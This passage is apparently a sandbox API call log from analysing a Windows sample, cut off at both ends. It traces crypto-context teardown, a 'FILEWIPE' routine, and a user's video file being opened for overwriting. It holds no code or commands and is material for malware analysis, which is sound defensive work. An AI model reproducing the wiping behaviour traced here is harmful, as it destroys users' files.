(HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0041.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0041.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x24) returned 0x7ac2f0 [0041.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0041.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0041.959] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0041.959] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0041.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0041.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0041.959] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0041.959] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1be8 [0041.959] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0041.959] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0041.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0041.960] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0041.960] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0041.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0041.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0041.960] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0041.960] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0041.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0041.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0041.960] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0041.960] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0041.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0041.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0041.960] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.960] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0041.960] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0041.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1be8 [0041.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0041.960] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0041.964] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0041.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0041.964] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0041.964] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.964] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.965] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0041.965] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0041.965] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0041.967] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0041.968] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0041.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0041.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0041.968] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0041.968] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0041.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0041.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0041.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0041.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0041.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0041.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0041.968] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.968] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0041.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0041.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0041.968] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0041.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0041.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0041.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0041.968] CryptDestroyKey (hKey=0x7c2280) returned 1 [0041.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0041.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0041.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da368 [0041.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0041.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0041.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0041.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0041.969] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0041.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0041.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0041.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0041.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0041.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0041.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0041.969] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0041.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0041.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0041.969] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0041.969] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0041.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0041.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0041.969] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0041.969] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0041.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0041.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0041.969] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0041.969] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0041.970] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0041.970] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0041.970] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0041.970] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0041.970] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0041.970] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0041.970] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0041.970] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.970] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0041.970] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.970] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0041.970] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0041.970] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0041.970] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.970] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0041.970] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0041.970] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.971] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.971] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0041.971] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0041.971] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0041.971] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.971] CryptReleaseContext (hProv=0x7d5b30, dwFlags=0x0) returned 1 [0041.971] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.971] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0041.971] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0041.971] FreeLibrary (hLibModule=0x754b0000) returned 1 [0041.971] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.971] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.971] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.971] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.971] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.971] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.972] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0041.972] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.972] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.972] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\S24Ya.flv", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x726f64d0, ftCreationTime.dwHighDateTime=0x1d5c1d7, ftLastAccessTime.dwLowDateTime=0xc0080c50, ftLastAccessTime.dwHighDateTime=0x1d5bb48, ftLastWriteTime.dwLowDateTime=0xc0080c50, ftLastWriteTime.dwHighDateTime=0x1d5bb48, nFileSizeHigh=0x0, nFileSizeLow=0x109f6, dwReserved0=0x0, dwReserved1=0x777648, cFileName="S24Ya.flv", cAlternateFileName="")) returned 0x7c2240 [0041.972] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0041.972] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.972] CharLowerBuffW (in: lpsz="byte[68086]", cchLength=0xb | out: lpsz="byte[68086]") returned 0xb [0041.973] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.973] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0041.973] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.973] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0041.973] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0041.973] FreeLibrary (hLibModule=0x76b40000) returned 1 [0041.973] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.973] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.973] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.973] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0041.973] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.973] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.973] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.973] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.973] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.973] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.973] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.974] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.974] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.974] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.974] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.974] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.974] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.974] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.974] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.974] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.974] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0041.974] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0041.974] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\S24Ya.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\s24ya.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0041.974] FreeLibrary (hLibModule=0x76e10000) returned 1 [0041.974] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.974] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.974] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.974] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0041.975] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.975] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.975] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0041.975] FreeLibrary (hLibModule=0x76e10000) returned 1 [0041.975] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.975] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.975] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.975] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.975] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0041.975] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.975] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.975] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0041.976] FreeLibrary (hLibModule=0x76e10000) returned 1 [0041.976] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.976] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.976] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.976] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\S24Ya.flv", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\S24Ya.flv", lpFilePart=0x0) returned 0x2e [0041.976] HeapFree (in: hHeap=0x770000, 